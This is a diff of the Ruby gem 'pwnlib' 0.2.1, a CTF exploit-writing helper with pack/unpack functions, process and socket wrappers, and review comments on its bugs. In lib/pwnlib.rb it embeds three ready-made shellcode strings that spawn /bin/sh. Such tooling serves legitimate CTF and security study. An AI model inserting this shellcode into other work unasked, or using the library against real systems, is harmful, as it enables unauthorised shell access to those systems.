pwnlib 0.2.0 → 0.2.1
- checksums.yaml +4 -4
- data/.gitignore +14 -0
- data/Gemfile +4 -0
- data/LICENSE +21 -0
- data/README.md +28 -0
- data/Rakefile +2 -0
- data/lib/pwnlib.rb +46 -0
- data/lib/pwnlib/process.rb +79 -0
- data/lib/pwnlib/version.rb +3 -0
- data/pwnlib.gemspec +23 -0
- metadata +13 -4
checksums.yaml
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
---
|
2
2
|
SHA1:
|
3
|
-
metadata.gz:
|
4
|
-
data.tar.gz:
|
3
|
+
metadata.gz: ff2b06f6519abcf757ecddf58841b5b1384b3640
|
4
|
+
data.tar.gz: e907d9101916780be928e8c6f9ee153714d5f75c
|
5
5
|
SHA512:
|
6
|
-
metadata.gz:
|
7
|
-
data.tar.gz:
|
6
|
+
metadata.gz: 207c2e5472b9caa403cb3243699ba4bbe0bb73bd5cc09e042df0a94f6ed6e6a1b37b00dd68f972df5f170773ce6eee587910c9a342f01fb77c0b07130c959f52
|
7
|
+
data.tar.gz: cead4ef9102b344523de32d7c95a28b74030e00e4b69ea199e3c79defb6ef7e29b5d3d2717763dcc86743125c727084127bf8101642477e71eb9cde576a9c8ac
|
data/.gitignore
ADDED
data/Gemfile
ADDED
data/LICENSE
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
The MIT License (MIT)
|
2
|
+
|
3
|
+
Copyright (c) 2016 Kyle Cook
|
4
|
+
|
5
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
6
|
+
of this software and associated documentation files (the "Software"), to deal
|
7
|
+
in the Software without restriction, including without limitation the rights
|
8
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
9
|
+
copies of the Software, and to permit persons to whom the Software is
|
10
|
+
furnished to do so, subject to the following conditions:
|
11
|
+
|
12
|
+
The above copyright notice and this permission notice shall be included in all
|
13
|
+
copies or substantial portions of the Software.
|
14
|
+
|
15
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
16
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
17
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
18
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
19
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
20
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
21
|
+
SOFTWARE.
|
data/README.md
ADDED
@@ -0,0 +1,28 @@
|
|
1
|
+
# Pwnlib
|
2
|
+
|
3
|
+
A simple gem used for creating exploits (usually for CTFs)
|
4
|
+
|
5
|
+
## Installation
|
6
|
+
|
7
|
+
Install with `gem install pwnlib` or use bundler
|
8
|
+
|
9
|
+
## Usage
|
10
|
+
|
11
|
+
Add
|
12
|
+
|
13
|
+
```ruby
|
14
|
+
require 'pwnlib'
|
15
|
+
include Pwnlib
|
16
|
+
|
17
|
+
p = process("./app")
|
18
|
+
|
19
|
+
p.close
|
20
|
+
```
|
21
|
+
|
22
|
+
## Contributing
|
23
|
+
|
24
|
+
1. Fork it ( https://github.com/[my-github-username]/pwnlib/fork )
|
25
|
+
2. Create your feature branch (`git checkout -b my-new-feature`)
|
26
|
+
3. Commit your changes (`git commit -am 'Add some feature'`)
|
27
|
+
4. Push to the branch (`git push origin my-new-feature`)
|
28
|
+
5. Create a new Pull Request
|
data/Rakefile
ADDED
data/lib/pwnlib.rb
ADDED
@@ -0,0 +1,46 @@
|
|
1
|
+
require 'pwnlib/process'
|
2
|
+
require 'socket'
|
3
|
+
|
4
|
+
module Pwnlib
|
5
|
+
def p64 num
|
6
|
+
num = num.hex if num.is_a? String
|
7
|
+
[num].pack("Q")
|
8
|
+
end
|
9
|
+
|
10
|
+
def p32 num
|
11
|
+
num = num.hex if num.is_a? String
|
12
|
+
[num].pack("L")
|
13
|
+
end
|
14
|
+
|
15
|
+
def u32 num
|
16
|
+
num.unpack("L")[0]
|
17
|
+
end
|
18
|
+
|
19
|
+
def u64 num
|
20
|
+
num.unpack("Q")[0]
|
21
|
+
end
|
22
|
+
|
23
|
+
def process name
|
24
|
+
stdin, stdout, wait_thr = Open3.popen2e name
|
25
|
+
stdout.sync
|
26
|
+
stdin.sync
|
27
|
+
ProcessRun.new stdin, stdout
|
28
|
+
end
|
29
|
+
|
30
|
+
def remote name, port
|
31
|
+
s = TCPSocket.new name, port
|
32
|
+
ProcessRun.new s, s
|
33
|
+
end
|
34
|
+
|
35
|
+
def i386_shellcode
|
36
|
+
"\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80".force_encoding("ASCII-8BIT")
|
37
|
+
end
|
38
|
+
|
39
|
+
def i386_shellcode_alt
|
40
|
+
"\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05".force_encoding("ASCII-8BIT")
|
41
|
+
end
|
42
|
+
|
43
|
+
def i386_shellcode_magic
|
44
|
+
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05".force_encoding("ASCII-8BIT")
|
45
|
+
end
|
46
|
+
end
|
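Review bot: `stdout.sync` and `stdin.sync` in `process` only read the sync flag and discard the result, so both pipes stay buffered; the intent reads as `stdout.sync = true` and `stdin.sync = true`. `Open3.popen2e name` with a single String is handed to `/bin/sh` whenever the string contains shell metacharacters, so a target path that comes from anywhere untrusted becomes a command line; the argv form `Open3.popen2e([name, name])` keeps it a plain exec. `Open3` itself is only required inside `class ProcessRun` in the following hunk, which works because `pwnlib/process` is loaded first, but a `require 'open3'` next to `require 'socket'` at the top of this file would make the dependency explicit. The `"L"`/`"Q"` pack formats are native-endian, so `p32`/`p64`/`u32`/`u64` change meaning on a big-endian host; `"L<"`/`"Q<"` pins little-endian. The `_alt` and `_magic` bodies carry a `\x48` REX prefix and `\x0f\x05`, which are 64-bit encodings, so the `i386_` prefix on those two names is misleading and worth a rename or a comment.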
@@ -0,0 +1,79 @@
|
|
1
|
+
class ProcessRun
|
2
|
+
require 'open3'
|
3
|
+
|
4
|
+
def initialize stdin, stdout
|
5
|
+
@stdin = stdin
|
6
|
+
@stdout = stdout
|
7
|
+
@output_buf = []
|
8
|
+
|
9
|
+
@get_input = true
|
10
|
+
@stdout_thr = Thread.new do
|
11
|
+
while @get_input
|
12
|
+
data = @stdout.readpartial(4096)
|
13
|
+
if data
|
14
|
+
lines = data.split("\n")
|
15
|
+
@output_buf += lines
|
16
|
+
end
|
17
|
+
end
|
18
|
+
end
|
19
|
+
end
|
20
|
+
|
21
|
+
def output
|
22
|
+
sleep 0.1
|
23
|
+
@output_buf.each {|l| puts l; }
|
24
|
+
output_clear
|
25
|
+
end
|
26
|
+
|
27
|
+
def raw_buffer
|
28
|
+
sleep 0.1
|
29
|
+
@output_buf
|
30
|
+
end
|
31
|
+
|
32
|
+
def output_clear
|
33
|
+
sleep 0.1
|
34
|
+
@output_buf = []
|
35
|
+
end
|
36
|
+
|
37
|
+
def recv
|
38
|
+
sleep 0.1
|
39
|
+
@output_buf.shift
|
40
|
+
end
|
41
|
+
|
42
|
+
def send msg
|
43
|
+
@stdin.write msg
|
44
|
+
sleep 0.1
|
45
|
+
end
|
46
|
+
|
47
|
+
def write msg
|
48
|
+
File.open("sploit", "w") do |f|
|
49
|
+
f.puts msg
|
50
|
+
end
|
51
|
+
end
|
52
|
+
|
53
|
+
def interactive
|
54
|
+
while 1
|
55
|
+
print "\n$> "
|
56
|
+
input = gets.chomp
|
57
|
+
|
58
|
+
if input == "exit" or input == "quit"
|
59
|
+
break
|
60
|
+
end
|
61
|
+
|
62
|
+
@stdin.puts(input)
|
63
|
+
|
64
|
+
sleep 0.1
|
65
|
+
output
|
66
|
+
end
|
67
|
+
end
|
68
|
+
|
69
|
+
def close
|
70
|
+
@stdout.flush
|
71
|
+
@stdin.flush
|
72
|
+
@get_input = false
|
73
|
+
|
74
|
+
output
|
75
|
+
|
76
|
+
@stdin.close
|
77
|
+
@stdout.close unless @stdin == @stdout
|
78
|
+
end
|
79
|
+
end
|
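Review bot: `@output_buf` is appended by the reader thread (`@output_buf += lines`) and shifted or replaced by the main thread (`recv`, `output_clear`) with no lock, and the `sleep 0.1` calls that stand in for synchronization make every read racy; `close` also sets `@get_input = false` but the thread stays blocked in `readpartial` and dies with `EOFError` once the pipe closes. This hunk has no file header on the rendered page; by the diffstat it appears to be `data/lib/pwnlib/process.rb`. The rewrite below guards the buffer with a `Mutex` and ends the thread cleanly on `EOFError`/`IOError`; `output`, `raw_buffer`, `output_clear` and `recv` should take the same lock, and `close` should `@stdout_thr.join` after closing the pipe. Separately, `def send msg` shadows `Object#send`, so any reflective call such as `run.send(:close)` writes the string `"close"` to the child's stdin instead of invoking the method; a name like `send_data` or `sendline` avoids the trap. `write msg` truncates a file named `sploit` in the current directory with no check at all, which is easy to trigger by accident given the name.
```ruby
  def initialize stdin, stdout
    @stdin = stdin
    @stdout = stdout
    @output_buf = []
    @buf_lock = Mutex.new

    @get_input = true
    @stdout_thr = Thread.new do
      begin
        while @get_input
          data = @stdout.readpartial(4096)
          @buf_lock.synchronize { @output_buf.concat(data.split("\n")) }
        end
      rescue EOFError, IOError
        # child closed its end, or close() closed the pipe: reading is over
      end
    end
  end

  # … unchanged: output, raw_buffer, output_clear, recv, send, write, interactive …

  def close
    @stdout.flush
    @stdin.flush
    @get_input = false

    output

    @stdin.close
    @stdout.close unless @stdin == @stdout
    @stdout_thr.join
  end
```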
data/pwnlib.gemspec
ADDED
@@ -0,0 +1,23 @@
|
|
1
|
+
# coding: utf-8
|
2
|
+
lib = File.expand_path('../lib', __FILE__)
|
3
|
+
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
|
4
|
+
require 'pwnlib/version'
|
5
|
+
|
6
|
+
Gem::Specification.new do |spec|
|
7
|
+
spec.name = "pwnlib"
|
8
|
+
spec.version = Pwnlib::VERSION
|
9
|
+
spec.authors = ["Kyle Cook"]
|
10
|
+
spec.email = ["kylecook80@gmail.com"]
|
11
|
+
spec.summary = %q{Ruby binary pwning library}
|
12
|
+
spec.description = %q{Library used to create exploits for binaries}
|
13
|
+
spec.homepage = ""
|
14
|
+
spec.license = "MIT"
|
15
|
+
|
16
|
+
spec.files = `git ls-files -z`.split("\x0")
|
17
|
+
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
|
18
|
+
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
|
19
|
+
spec.require_paths = ["lib"]
|
20
|
+
|
21
|
+
spec.add_development_dependency "bundler", "~> 1.7"
|
22
|
+
spec.add_development_dependency "rake", "~> 10.0"
|
23
|
+
end
|
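Review bot: `spec.homepage = ""` leaves the gem with no homepage (the regenerated metadata hunk below shows `homepage: ''`), and `spec.files = \`git ls-files -z\`` makes the packaged file list depend on a git checkout, so `gem build` from an exported tree packages nothing. A static list such as `spec.files = Dir["lib/**/*.rb"] + %w[LICENSE README.md]` is reproducible and does not shell out. The spec also sets no `spec.required_ruby_version`, which is worth adding once a minimum is known.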
metadata
CHANGED
@@ -1,14 +1,14 @@
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
2
2
|
name: pwnlib
|
3
3
|
version: !ruby/object:Gem::Version
|
4
|
-
version: 0.2.
|
4
|
+
version: 0.2.1
|
5
5
|
platform: ruby
|
6
6
|
authors:
|
7
7
|
- Kyle Cook
|
8
8
|
autorequire:
|
9
9
|
bindir: bin
|
10
10
|
cert_chain: []
|
11
|
-
date: 2016-01-
|
11
|
+
date: 2016-01-31 00:00:00.000000000 Z
|
12
12
|
dependencies:
|
13
13
|
- !ruby/object:Gem::Dependency
|
14
14
|
name: bundler
|
@@ -38,13 +38,22 @@ dependencies:
|
|
38
38
|
- - "~>"
|
39
39
|
- !ruby/object:Gem::Version
|
40
40
|
version: '10.0'
|
41
|
-
description: Library used to create exploits for
|
41
|
+
description: Library used to create exploits for binaries
|
42
42
|
email:
|
43
43
|
- kylecook80@gmail.com
|
44
44
|
executables: []
|
45
45
|
extensions: []
|
46
46
|
extra_rdoc_files: []
|
47
|
-
files:
|
47
|
+
files:
|
48
|
+
- ".gitignore"
|
49
|
+
- Gemfile
|
50
|
+
- LICENSE
|
51
|
+
- README.md
|
52
|
+
- Rakefile
|
53
|
+
- lib/pwnlib.rb
|
54
|
+
- lib/pwnlib/process.rb
|
55
|
+
- lib/pwnlib/version.rb
|
56
|
+
- pwnlib.gemspec
|
48
57
|
homepage: ''
|
49
58
|
licenses:
|
50
59
|
- MIT
|